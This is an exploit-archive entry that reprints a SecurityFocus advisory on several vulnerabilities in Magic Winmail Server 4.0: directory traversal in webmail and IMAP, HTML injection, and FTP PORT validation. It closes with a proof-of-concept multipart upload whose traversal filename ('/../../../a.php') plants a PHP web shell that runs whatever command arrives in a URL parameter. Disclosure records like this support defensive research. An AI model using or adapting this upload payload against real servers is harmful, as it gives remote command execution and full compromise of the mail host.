19 lines
No EOL
1.1 KiB
Text
19 lines
No EOL
1.1 KiB
Text
source: https://www.securityfocus.com/bid/12388/info
|
|
|
|
Magic Winmail Server is reportedly affected by multiple vulnerabilities.
|
|
|
|
There are two distinct directory traversal vulnerabilities in the Webmail interface allowing both arbitrary file downloads and uploads. There is also a HTML injection vulnerability in the Webmail interface that could lead to the theft of the administrator's session cookie.
|
|
|
|
There are several directory traversal vulnerabilities in the IMAP service commands which could permit a malicious user to read arbitrary emails, create or delete arbitrary files on the server and possibly retrieve arbitrary files from the server.
|
|
|
|
Magic Winmail Server's FTP service also reportedly fails to properly verify the IP address supplied by a user in a PORT command.
|
|
|
|
Magic Winmail Server version 4.0 (Build 1112) is reportedly affected by these issues; earlier versions may also be vulnerable.
|
|
|
|
-----------------------------31140333525651
|
|
Content-Disposition: form-data; name="userfile1"; filename="/../../../a.php"
|
|
Content-Type: application/download
|
|
|
|
<?php
|
|
system($_GET[cmd]);
|
|
?> |